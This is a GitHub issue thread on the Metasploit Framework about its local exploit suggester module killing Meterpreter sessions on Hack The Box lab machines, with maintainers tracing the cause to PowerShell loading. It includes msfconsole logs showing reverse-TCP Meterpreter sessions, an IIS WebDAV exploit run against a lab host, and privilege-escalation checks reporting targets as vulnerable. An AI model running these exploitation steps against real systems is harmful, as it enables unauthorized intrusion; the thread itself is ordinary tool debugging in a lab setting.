bcoles
commented
2 years ago Please post the output when running local_exploit_suggester with set verbose true.
Closed yaseenit7 closed 2 years ago
bcoles
commented
2 years ago Please post the output when running local_exploit_suggester with set verbose true.
yaseenit7
commented
2 years ago Please post the output when running
local_exploit_suggesterwithset verbose true.
I did that "set verbose true" but didn't displayed anything. Please find the image below
bcoles
commented
2 years ago I did that "set verbose true" but didn't displayed anything. Please find the image below
Strange. The module must being dying in setup before trying (or even listing) the exploits it is going to check. Is session 1 a valid session? If so, what kind of session/payload?
I can't reproduce this on Windows 7 SP1 with a windows/meterpreter/reverse_tcp payload.
msf6 exploit(multi/handler) >
[*] Sending stage (175174 bytes) to 172.16.191.236
[*] Meterpreter session 1 opened (172.16.191.192:1337 -> 172.16.191.236:57997 ) at 2021-12-09 09:49:04 -0500
msf6 exploit(multi/handler) > use post/multi/recon/local_exploit_suggester
msf6 post(multi/recon/local_exploit_suggester) > set verbose true
verbose => true
msf6 post(multi/recon/local_exploit_suggester) > set session 1
session => 1
msf6 post(multi/recon/local_exploit_suggester) > run
[*] 172.16.191.236 - Collecting local exploits for x86/windows...
[*] 172.16.191.236 - The following 4 exploit checks are being tried:
[*] 172.16.191.236 - exploit/windows/local/adobe_sandbox_adobecollabsync
[*] 172.16.191.236 - exploit/windows/local/always_install_elevated
[*] 172.16.191.236 - exploit/windows/local/ms10_092_schelevator
[*] 172.16.191.236 - exploit/windows/local/panda_psevents
[*] 172.16.191.236 - exploit/windows/local/adobe_sandbox_adobecollabsync: Cannot reliably check exploitability.
[*] 172.16.191.236 - exploit/windows/local/always_install_elevated: The target is not exploitable.
[+] 172.16.191.236 - exploit/windows/local/ms10_092_schelevator: The target appears to be vulnerable.
[*] 172.16.191.236 - exploit/windows/local/panda_psevents: The target is not exploitable.
[*] Post module execution completed
msf6 post(multi/recon/local_exploit_suggester) > Nor with a windows/x64/meterpreter/reverse_tcp payload.
msf6 exploit(multi/handler) >
[*] Sending stage (200262 bytes) to 172.16.191.236
[*] Meterpreter session 1 opened (172.16.191.192:1337 -> 172.16.191.236:58012 ) at 2021-12-09 09:51:05 -0500
msf6 exploit(multi/handler) > use post/multi/recon/local_exploit_suggester
msf6 post(multi/recon/local_exploit_suggester) > set session 1
session => 1
msf6 post(multi/recon/local_exploit_suggester) > set verbose true
verbose => true
msf6 post(multi/recon/local_exploit_suggester) > run
[*] 172.16.191.236 - Collecting local exploits for x64/windows...
[*] 172.16.191.236 - The following 3 exploit checks are being tried:
[*] 172.16.191.236 - exploit/windows/local/always_install_elevated
[*] 172.16.191.236 - exploit/windows/local/ms10_092_schelevator
[*] 172.16.191.236 - exploit/windows/local/virtual_box_opengl_escape
[*] 172.16.191.236 - exploit/windows/local/always_install_elevated: The target is not exploitable.
[+] 172.16.191.236 - exploit/windows/local/ms10_092_schelevator: The target appears to be vulnerable.
[*] 172.16.191.236 - exploit/windows/local/virtual_box_opengl_escape: The target is not exploitable.
[*] Post module execution completed
msf6 post(multi/recon/local_exploit_suggester) > Someone else posted an issue (#15907) about local exploit suggester killing their Linux session recently. I could not reproduce that issue either.
dwelch-r7
commented
2 years ago Hey @yaseenit7 I tested this with version 6.1.14 like you did against the HTB Granny box and it worked for me too, I followed the official guide provided by HTB, did you use that one too or did you try another method?
yaseenit7
commented
2 years ago @dwelch-r7 which official guide are you talkin about, you mean the Official HTB Write-up?... I did htb arctic box today still the same issue with arctic box (session dies and not stable). I think there is some mess with my machine's metasploit framework. I would like to restore to default or reinstall the metasploit would be better thing to do...Would you please suggest the steps either to restore as fresh metasploit or reinstall as fresh....
gwillcox-r7
commented
2 years ago @dwelch-r7 which official guide are you talkin about, you mean the Official HTB Write-up?... I did htb arctic box today still the same issue with arctic box (session dies and not stable). I think there is some mess with my machine's metasploit framework. I would like to restore to default or reinstall the metasploit would be better thing to do...Would you please suggest the steps either to restore as fresh metasploit or reinstall as fresh....
To install fresh, can grab an installer from https://github.com/rapid7/metasploit-framework/wiki/Nightly-Installers or follow the directions at https://github.com/rapid7/metasploit-framework/wiki/Setting-Up-a-Metasploit-Development-Environment
dwelch-r7
commented
2 years ago @yaseenit7 yes sorry I meant the Official HTB Write up from here https://app.hackthebox.com/machines/Granny/walkthroughs if that works for you then the problem probably isn't iwht the exploit suggester but maybe your original session is unstable
king0ni
commented
2 years ago Also experiencing same issue on HTB Arctic on a fresh build of Kali 5.15.0 with Meterpreter 6.1.21-dev. Have used both windows/x64/meterpreter/reverse_tcp and windows/meterpreter/reverse_tcp payloads (migrating to an x64 service). In both cases, session dies 100% of the time when running local_exploit_suggester, but the shells are stable doing anything else I've tried. Seems it's complaining that post/multi/recon/local_exploit_suggester can't be clearly found, though I can 'use' the module, configure it and make it start to run. Any way I can help provide further info or try anything to narrow this down?
meterpreter > run post/multi/recon/local_exploit_suggester
[*] 10.10.10.11 - Collecting local exploits for x64/windows...
[*] 10.10.10.11 - Meterpreter session 1 closed. Reason: Died [-] 10.10.10.11 - Session not found
Some Debug output below:
Module/Datastore
The following global/module datastore, and database setup was configured before the issue occurred:
Collapse
``` [framework/core] RHOSTS=10.10.10.11 lhost=tun0 [framework/ui/console] ActiveModule=post/multi/recon/local_exploit_suggester [multi/recon/local_exploit_suggester] WORKSPACE= VERBOSE=true SESSION=1 SHOWDESCRIPTION=false ## Framework Errors [01/05/2022 00:51:09] [e(0)] core: Dependency for windows/encrypted_reverse_tcp is not supported [01/05/2022 00:52:51] [e(0)] core: Dependency for windows/encrypted_shell_reverse_tcp is not supported [01/05/2022 00:52:51] [e(0)] core: Dependency for windows/encrypted_reverse_tcp is not supported [01/05/2022 00:56:19] [e(0)] core: Dependency for windows/encrypted_shell_reverse_tcp is not supported [01/05/2022 00:56:19] [e(0)] core: Dependency for windows/encrypted_reverse_tcp is not supported [01/05/2022 00:57:36] [e(0)] core: Dependency for windows/encrypted_shell_reverse_tcp is not supported [01/05/2022 00:57:36] [e(0)] core: Dependency for windows/encrypted_reverse_tcp is not supported [01/05/2022 01:03:26] [e(0)] core: Dependency for windows/encrypted_shell_reverse_tcp is not supported [01/05/2022 01:03:26] [e(0)] core: Dependency for windows/encrypted_reverse_tcp is not supported [01/05/2022 01:23:31] [e(0)] meterpreter: Failed to load extension: No module of the name post/multi/recon/local_exploit_suggester found ## Web Service Errors The following web service errors occurred before the issue occurred:Collapse
``` msf-ws.log does not exist. ``` ##Framework logs [01/05/2022 00:38:49] [d(0)] core: HistoryManager.push_context name: :msfconsole [01/05/2022 00:51:09] [e(0)] core: Dependency for windows/encrypted_shell_reverse_tcp is not supported [01/05/2022 00:51:09] [e(0)] core: Dependency for windows/encrypted_reverse_tcp is not supported [01/05/2022 00:52:51] [e(0)] core: Dependency for windows/encrypted_shell_reverse_tcp is not supported [01/05/2022 00:52:51] [e(0)] core: Dependency for windows/encrypted_reverse_tcp is not supported [01/05/2022 00:56:19] [e(0)] core: Dependency for windows/encrypted_shell_reverse_tcp is not supported [01/05/2022 00:56:19] [e(0)] core: Dependency for windows/encrypted_reverse_tcp is not supported [01/05/2022 00:57:36] [e(0)] core: Dependency for windows/encrypted_shell_reverse_tcp is not supported [01/05/2022 00:57:36] [e(0)] core: Dependency for windows/encrypted_reverse_tcp is not supported [01/05/2022 01:03:26] [e(0)] core: Dependency for windows/encrypted_shell_reverse_tcp is not supported [01/05/2022 01:03:26] [e(0)] core: Dependency for windows/encrypted_reverse_tcp is not supported [01/05/2022 01:04:15] [d(0)] core: HistoryManager.push_context name: :meterpreter [01/05/2022 01:07:39] [d(0)] core: Reloading module post/multi/recon/local_exploit_suggester... [01/05/2022 01:07:39] [w(0)] core: The module multi/recon/local_exploit_suggester is ambiguous with multi/recon/local_exploit_suggester. [01/05/2022 01:07:39] [d(0)] core: Refreshing multi/recon/local_exploit_suggester of type: post [01/05/2022 01:07:55] [w(0)] core: Session 1 has died ## Version/Install Framework: 6.1.21-dev Ruby: ruby 2.7.4p191 (2021-07-07 revision a21a3b7d23) [x86_64-linux-gnu]
bcoles
commented
2 years ago Any way I can help provide further info or try anything to narrow this down?
Was the session valid? ie; were you able to run commands on the session before trying the local exploit suggester module?
Try running with set verbose true to see if it is failing on a particular module.
king0ni
commented
2 years ago Any way I can help provide further info or try anything to narrow this down?
Was the session valid? ie; were you able to run commands on the session before trying the local exploit suggester module?
Try running with
set verbose trueto see if it is failing on a particular module.
Yes, sessions were valid. I could sit there and run all sorts of commands for 20+ minutes and never an issue. Have tried this at least 10 times now on different days. If you expand the excerpt of debug info in my above post you will see where it shows verbose was set to true, but not much more info.
The last messages right before it dies are: [01/05/2022 01:07:39] [d(0)] core: Reloading module post/multi/recon/local_exploit_suggester... [01/05/2022 01:07:39] [w(0)] core: The module multi/recon/local_exploit_suggester is ambiguous with multi/recon/local_exploit_suggester. [01/05/2022 01:07:39] [d(0)] core: Refreshing multi/recon/local_exploit_suggester of type: post
dwelch-r7
commented
2 years ago hey @king0ni thank you for the feedback I think I've managed to replicate the issue now, seems like sometimes when checking for session compatibility we try to load the powershell extension and that's killing the session, not sure why yet but I'll keep digging
king0ni
commented
2 years ago hey @king0ni thank you for the feedback I think I've managed to replicate the issue now, seems like sometimes when checking for session compatibility we try to load the powershell extension and that's killing the session, not sure why yet but I'll keep digging
Thanks @dwelch-r7 that's great news! Some info that might be helpful for you is that I have noticed any time I take an action on this particular machine (Arctic) to use or load PowerShell (whether in or outside of meterpreter), it kills the meterpreter channel or for a non-meterpreter shell it freezes and kills it. I've experienced this with PowerShell happen on some other VMs and was assuming this happens with PowerShell as part of some security function taking place (Defender?) Is responsive PowerShell a dependency of local_exploit_suggester module?
dwelch-r7
commented
2 years ago you're spot on with the underlying cause yea, attempting to load powershell is what is causing the session to die
the local_exploit_suggester in an attempt to filter out which modules do/don't work for that session is trying to load powershell on the session, if you remove powershell_execute from the Compat sections of cve_2020_1337_printerdemon.rb and tokenmagic.rb and then run local_exploit_suggester it should no longer fail if you need a temp workaround
yaseenit7
commented
2 years ago @dwelch-r7 yesss, the issue has been fixed. Thanks a lot for solving. Removed the "powershell_execute" string from the 2 files and tried in both granny and arctic htb boxes, the session was not terminated.
But there is one caveat I have noticed after running suggester i.e., only few exploit checks are being tried like just 3 exploit checks [Image 1]. However it need to check for more than 10 exploit checks. This has been confirmed from internet blog's walkthrough screenshot [Image 2] and link given below. Appreciate your consideration on this too. My anticipation was that it could may be we removed the "powershell_execute" string probably.
[Image 1]
[Image 2] https://dev.to/artis3n/writeup-hackthebox-arctic-with-metasploit-oi
dwelch-r7
commented
2 years ago @yaseenit7 glad that worked for ya! yea that's something we're aware of already it's being tracked here https://github.com/rapid7/metasploit-framework/issues/15949
yaseenit7
commented
2 years ago @dwelch-r7 Oh ok let me catch up there.
bcoles
commented
2 years ago I believe this has been fixed in metasploit-payloads version 2.0.69 in https://github.com/rapid7/metasploit-payloads/pull/522 a couple of weeks ago.
The version of metasploit-payloads in use within Metasploit was bumped to version 2.0.69 in #16095 a few days ago. This issue should be patched in the weekly release on Friday.
Edit: It should already be fixed on master if you're using the git repo.
bcoles
commented
2 years ago This issue has been resolved.
But there is one caveat I have noticed after running suggester i.e., only few exploit checks are being tried like just 3 exploit checks
This is tracked in #15949.
Steps to reproduce
How'd you do it?
This section should also tell us any relevant information about the environment; for example, if an exploit that used to work is failing, tell us the victim operating system and service versions.
Were you following a specific guide/tutorial or reading documentation?
If yes link the guide/tutorial or documentation you were following here, otherwise you may omit this section.
Expected behavior
What should happen? The suggester should lists the possible exploits for privilege escalation which are potentially exploitable
Current behavior
What happens instead? It doesn't lists anything rather it kills the meterpreter session probably
Metasploit version
Get this with the
versioncommand in msfconsole (orgit log -1 --pretty=onelinefor a source install). Framework: 6.1.14-dev, Console : 6.1.14-devAdditional Information
If your version is less than
5.0.96, please update to the latest version and ensure your issue is still present.If the issue is encountered within
msfconsole, please run thedebugcommand using the instructions below. If the issue is encountered outisdemsfconsole, or the issue causesmsfconsoleto crash on startup, please delete this section.msfconsoleset loglevel 3debugcommand===8<=== CUT AND PASTE EVERYTHING BELOW THIS LINE ===8<===line and make sure to REMOVE ANY SENSITIVE INFORMATION.Here is a proof that while running suggester, the Meterpreter session 1 closed. Reason: Died...then i ran debug command
------------------------------------------------------------------------------------------------------------------------------------------------- **msf6 post(multi/recon/local_exploit_suggester) > run
[] 10.10.10.14 - Collecting local exploits for x86/windows... [] 10.10.10.14 - Meterpreter session 1 closed. Reason: Died ^C[-] 10.10.10.14 - Post interrupted by the console user [*] Post module execution completed* -----------------------------------------*-------------------------------------------------------------------------------------------------------- msf6 post(multi/recon/local_exploit_suggester) > debug Please provide the below information in any Github issues you open. New issues can be opened here https://github.com/rapid7/metasploit-framework/issues/new/choose ENSURE YOU HAVE REMOVED ANY SENSITIVE INFORMATION BEFORE SUBMITTING!
===8<=== CUT AND PASTE EVERYTHING BELOW THIS LINE ===8<===
Module/Datastore
The following global/module datastore, and database setup was configured before the issue occurred:
Collapse
``` [framework/core] loglevel=3 [framework/database/sr2Oacb8] url=[Filtered] [framework/ui/console] ActiveModule=post/multi/recon/local_exploit_suggester [multi/recon/local_exploit_suggester] WORKSPACE= VERBOSE=true SESSION=1 SHOWDESCRIPTION=false ```History
The following commands were ran during the session and before this issue occurred:
Collapse
``` 1305 set loglevel 3 1306 options 1307 search iis 6.0 1308 use 2 1309 set rhosts 10.10.10.14 1310 set lhost tun0 1311 run 1312 oiptions 1313 options 1314 exploit 1315 set targeturi /_vti_bin/ 1316 options 1317 run 1318 debug 1319 sessions 1320 sessions -i 1 1321 search suggester 1322 use 0 1323 options 1324 set session 1 1325 set verbose true 1326 run 1327 debug ```Framework Errors
The following framework errors occurred before the issue occurred:
Collapse
``` [12/08/2021 00:12:14] [e(0)] core: Exploit failed (multi/handler): Interrupt - Interrupt [12/08/2021 00:13:29] [e(0)] core: Error loading sysinfo - Rex::Post::Meterpreter::RequestError stdapi_sys_config_getuid: Operation failed: Access is denied. [12/08/2021 00:14:12] [e(0)] core: Exploit failed (multi/handler): Interrupt - Interrupt [12/08/2021 00:14:24] [e(0)] meterpreter: stdapi_sys_config_getuid: Operation failed: Access is denied. [12/08/2021 14:44:07] [e(0)] meterpreter: Error running command shell: Rex::TimeoutError Operation timed out. [12/08/2021 14:52:28] [e(0)] core: Exploit failed (multi/handler): Interrupt - Interrupt [12/08/2021 14:54:13] [e(0)] core: Exploit failed (multi/handler): Interrupt - Interrupt [12/08/2021 15:21:56] [e(0)] core: Error loading sysinfo - Rex::Post::Meterpreter::RequestError stdapi_sys_config_getuid: Operation failed: Access is denied. [12/08/2021 15:30:57] [e(0)] core: Error loading sysinfo - Rex::Post::Meterpreter::RequestError stdapi_sys_config_getuid: Operation failed: Access is denied. [12/08/2021 15:41:54] [e(0)] core: Exploit failed (windows/iis/iis_webdav_scstoragepathfromurl): Interrupt - Interrupt Call stack: /usr/share/metasploit-framework/vendor/bundle/ruby/2.7.0/gems/rex-socket-0.1.34/lib/rex/socket/comm/local.rb:267:in `connect' /usr/share/metasploit-framework/vendor/bundle/ruby/2.7.0/gems/rex-socket-0.1.34/lib/rex/socket/comm/local.rb:267:in `block in create_by_type' /usr/lib/ruby/2.7.0/timeout.rb:95:in `block in timeout' /usr/lib/ruby/2.7.0/timeout.rb:33:in `block in catch' /usr/lib/ruby/2.7.0/timeout.rb:33:in `catch' /usr/lib/ruby/2.7.0/timeout.rb:33:in `catch' /usr/lib/ruby/2.7.0/timeout.rb:110:in `timeout' /usr/share/metasploit-framework/vendor/bundle/ruby/2.7.0/gems/rex-socket-0.1.34/lib/rex/socket/comm/local.rb:266:in `create_by_type' /usr/share/metasploit-framework/vendor/bundle/ruby/2.7.0/gems/rex-socket-0.1.34/lib/rex/socket/comm/local.rb:33:in `create' /usr/share/metasploit-framework/vendor/bundle/ruby/2.7.0/gems/rex-socket-0.1.34/lib/rex/socket.rb:51:in `create_param' /usr/share/metasploit-framework/vendor/bundle/ruby/2.7.0/gems/rex-socket-0.1.34/lib/rex/socket/tcp.rb:37:in `create_param' /usr/share/metasploit-framework/vendor/bundle/ruby/2.7.0/gems/rex-socket-0.1.34/lib/rex/socket/tcp.rb:28:in `create' /usr/share/metasploit-framework/lib/rex/proto/http/client.rb:174:in `connect' /usr/share/metasploit-framework/lib/rex/proto/http/client.rb:251:in `send_request' /usr/share/metasploit-framework/lib/rex/proto/http/client.rb:232:in `_send_recv' /usr/share/metasploit-framework/lib/rex/proto/http/client.rb:209:in `send_recv' /usr/share/metasploit-framework/lib/msf/core/exploit/remote/http_client.rb:374:in `send_request_raw' /usr/share/metasploit-framework/modules/exploits/windows/iis/iis_webdav_scstoragepathfromurl.rb:240:in `block in exploit' /usr/share/metasploit-framework/modules/exploits/windows/iis/iis_webdav_scstoragepathfromurl.rb:200:in `upto' /usr/share/metasploit-framework/modules/exploits/windows/iis/iis_webdav_scstoragepathfromurl.rb:200:in `exploit' /usr/share/metasploit-framework/lib/msf/core/exploit_driver.rb:215:in `job_run_proc' /usr/share/metasploit-framework/lib/msf/core/exploit_driver.rb:168:in `run' /usr/share/metasploit-framework/lib/msf/base/simple/exploit.rb:144:in `exploit_simple' /usr/share/metasploit-framework/lib/msf/base/simple/exploit.rb:171:in `exploit_simple' /usr/share/metasploit-framework/lib/msf/ui/console/command_dispatcher/exploit.rb:45:in `exploit_single' /usr/share/metasploit-framework/lib/msf/ui/console/command_dispatcher/exploit.rb:177:in `cmd_exploit' /usr/share/metasploit-framework/lib/rex/ui/text/dispatcher_shell.rb:562:in `run_command' /usr/share/metasploit-framework/lib/rex/ui/text/dispatcher_shell.rb:511:in `block in run_single' /usr/share/metasploit-framework/lib/rex/ui/text/dispatcher_shell.rb:505:in `each' /usr/share/metasploit-framework/lib/rex/ui/text/dispatcher_shell.rb:505:in `run_single' /usr/share/metasploit-framework/lib/rex/ui/text/shell.rb:162:in `run' /usr/share/metasploit-framework/lib/metasploit/framework/command/console.rb:48:in `start' /usr/share/metasploit-framework/lib/metasploit/framework/command/base.rb:82:in `start' /usr/bin/msfconsole:23:in `Web Service Errors
The following web service errors occurred before the issue occurred:
Collapse
``` msf-ws.log does not exist. ```Framework Logs
The following framework logs were recorded before the issue occurred:
Collapse
``` [12/08/2021 15:48:45] [i(2)] core: Reloading exploit module windows/smb/ms09_050_smb2_negotiate_func_index. Ambiguous module warnings are safe to ignore [12/08/2021 15:48:45] [i(2)] core: Reloading exploit module windows/smb/ms10_046_shortcut_icon_dllloader. Ambiguous module warnings are safe to ignore [12/08/2021 15:48:45] [i(2)] core: Reloading exploit module windows/smb/ms10_061_spoolss. Ambiguous module warnings are safe to ignore [12/08/2021 15:48:45] [i(2)] core: Reloading exploit module windows/smb/ms15_020_shortcut_icon_dllloader. Ambiguous module warnings are safe to ignore [12/08/2021 15:48:45] [i(2)] core: Reloading exploit module windows/smb/ms17_010_eternalblue. Ambiguous module warnings are safe to ignore [12/08/2021 15:48:45] [i(2)] core: Reloading exploit module windows/smb/ms17_010_psexec. Ambiguous module warnings are safe to ignore [12/08/2021 15:48:45] [i(2)] core: Reloading exploit module windows/smb/netidentity_xtierrpcpipe. Ambiguous module warnings are safe to ignore [12/08/2021 15:48:45] [i(2)] core: Reloading exploit module windows/smb/psexec. Ambiguous module warnings are safe to ignore [12/08/2021 15:48:45] [i(2)] core: Reloading exploit module windows/smb/smb_delivery. Ambiguous module warnings are safe to ignore [12/08/2021 15:48:45] [i(2)] core: Reloading exploit module windows/smb/smb_doublepulsar_rce. Ambiguous module warnings are safe to ignore [12/08/2021 15:48:45] [i(2)] core: Reloading exploit module windows/smb/smb_relay. Ambiguous module warnings are safe to ignore [12/08/2021 15:48:45] [i(2)] core: Reloading exploit module windows/smb/smb_rras_erraticgopher. Ambiguous module warnings are safe to ignore [12/08/2021 15:48:45] [i(2)] core: Reloading exploit module windows/smb/timbuktu_plughntcommand_bof. Ambiguous module warnings are safe to ignore [12/08/2021 15:48:45] [i(2)] core: Reloading exploit module windows/smb/webexec. Ambiguous module warnings are safe to ignore [12/08/2021 15:48:45] [i(2)] core: Reloading exploit module windows/smtp/mailcarrier_smtp_ehlo. Ambiguous module warnings are safe to ignore [12/08/2021 15:48:45] [i(2)] core: Reloading exploit module windows/smtp/mercury_cram_md5. Ambiguous module warnings are safe to ignore [12/08/2021 15:48:45] [i(2)] core: Reloading exploit module windows/smtp/ms03_046_exchange2000_xexch50. Ambiguous module warnings are safe to ignore [12/08/2021 15:48:45] [i(2)] core: Reloading exploit module windows/smtp/njstar_smtp_bof. Ambiguous module warnings are safe to ignore [12/08/2021 15:48:45] [i(2)] core: Reloading exploit module windows/smtp/sysgauge_client_bof. Ambiguous module warnings are safe to ignore [12/08/2021 15:48:45] [i(2)] core: Reloading exploit module windows/smtp/wmailserver. Ambiguous module warnings are safe to ignore [12/08/2021 15:48:45] [i(2)] core: Reloading exploit module windows/smtp/ypops_overflow1. Ambiguous module warnings are safe to ignore [12/08/2021 15:48:45] [i(2)] core: Reloading exploit module windows/ssh/freeftpd_key_exchange. Ambiguous module warnings are safe to ignore [12/08/2021 15:48:45] [i(2)] core: Reloading exploit module windows/ssh/freesshd_authbypass. Ambiguous module warnings are safe to ignore [12/08/2021 15:48:45] [i(2)] core: Reloading exploit module windows/ssh/freesshd_key_exchange. Ambiguous module warnings are safe to ignore [12/08/2021 15:48:45] [i(2)] core: Reloading exploit module windows/ssh/putty_msg_debug. Ambiguous module warnings are safe to ignore [12/08/2021 15:48:45] [i(2)] core: Reloading exploit module windows/ssh/securecrt_ssh1. Ambiguous module warnings are safe to ignore [12/08/2021 15:48:45] [i(2)] core: Reloading exploit module windows/ssh/sysax_ssh_username. Ambiguous module warnings are safe to ignore [12/08/2021 15:48:45] [i(2)] core: Reloading exploit module windows/ssl/ms04_011_pct. Ambiguous module warnings are safe to ignore [12/08/2021 15:48:45] [i(2)] core: Reloading exploit module windows/telnet/gamsoft_telsrv_username. Ambiguous module warnings are safe to ignore [12/08/2021 15:48:45] [i(2)] core: Reloading exploit module windows/telnet/goodtech_telnet. Ambiguous module warnings are safe to ignore [12/08/2021 15:48:45] [i(2)] core: Reloading exploit module windows/tftp/attftp_long_filename. Ambiguous module warnings are safe to ignore [12/08/2021 15:48:45] [i(2)] core: Reloading exploit module windows/tftp/distinct_tftp_traversal. Ambiguous module warnings are safe to ignore [12/08/2021 15:48:45] [i(2)] core: Reloading exploit module windows/tftp/dlink_long_filename. Ambiguous module warnings are safe to ignore [12/08/2021 15:48:45] [i(2)] core: Reloading exploit module windows/tftp/futuresoft_transfermode. Ambiguous module warnings are safe to ignore [12/08/2021 15:48:45] [i(2)] core: Reloading exploit module windows/tftp/netdecision_tftp_traversal. Ambiguous module warnings are safe to ignore [12/08/2021 15:48:45] [i(2)] core: Reloading exploit module windows/tftp/opentftp_error_code. Ambiguous module warnings are safe to ignore [12/08/2021 15:48:45] [i(2)] core: Reloading exploit module windows/tftp/quick_tftp_pro_mode. Ambiguous module warnings are safe to ignore [12/08/2021 15:48:45] [i(2)] core: Reloading exploit module windows/tftp/tftpd32_long_filename. Ambiguous module warnings are safe to ignore [12/08/2021 15:48:45] [i(2)] core: Reloading exploit module windows/tftp/tftpdwin_long_filename. Ambiguous module warnings are safe to ignore [12/08/2021 15:48:45] [i(2)] core: Reloading exploit module windows/tftp/tftpserver_wrq_bof. Ambiguous module warnings are safe to ignore [12/08/2021 15:48:45] [i(2)] core: Reloading exploit module windows/tftp/threectftpsvc_long_mode. Ambiguous module warnings are safe to ignore [12/08/2021 15:48:45] [i(2)] core: Reloading exploit module windows/unicenter/cam_log_security. Ambiguous module warnings are safe to ignore [12/08/2021 15:48:45] [i(2)] core: Reloading exploit module windows/vnc/realvnc_client. Ambiguous module warnings are safe to ignore [12/08/2021 15:48:45] [i(2)] core: Reloading exploit module windows/vnc/ultravnc_client. Ambiguous module warnings are safe to ignore [12/08/2021 15:48:45] [i(2)] core: Reloading exploit module windows/vnc/ultravnc_viewer_bof. Ambiguous module warnings are safe to ignore [12/08/2021 15:48:45] [i(2)] core: Reloading exploit module windows/vnc/winvnc_http_get. Ambiguous module warnings are safe to ignore [12/08/2021 15:48:45] [i(2)] core: Reloading exploit module windows/vpn/safenet_ike_11. Ambiguous module warnings are safe to ignore [12/08/2021 15:48:45] [i(2)] core: Reloading exploit module windows/winrm/winrm_script_exec. Ambiguous module warnings are safe to ignore [12/08/2021 15:48:45] [i(2)] core: Reloading exploit module windows/wins/ms04_045_wins. Ambiguous module warnings are safe to ignore [12/08/2021 15:48:59] [w(0)] core: Session 1 has died ```Web Service Logs
The following web service logs were recorded before the issue occurred:
Collapse
``` msf-ws.log does not exist. ```Version/Install
The versions and install method of your Metasploit setup:
Collapse
``` Framework: 6.1.14-dev Ruby: ruby 2.7.3p183 (2021-04-05 revision 6847ee089d) [x86_64-linux-gnu] Install Root: /usr/share/metasploit-framework Session Type: Connected to msf. Connection type: postgresql. Install Method: Other - Please specify ```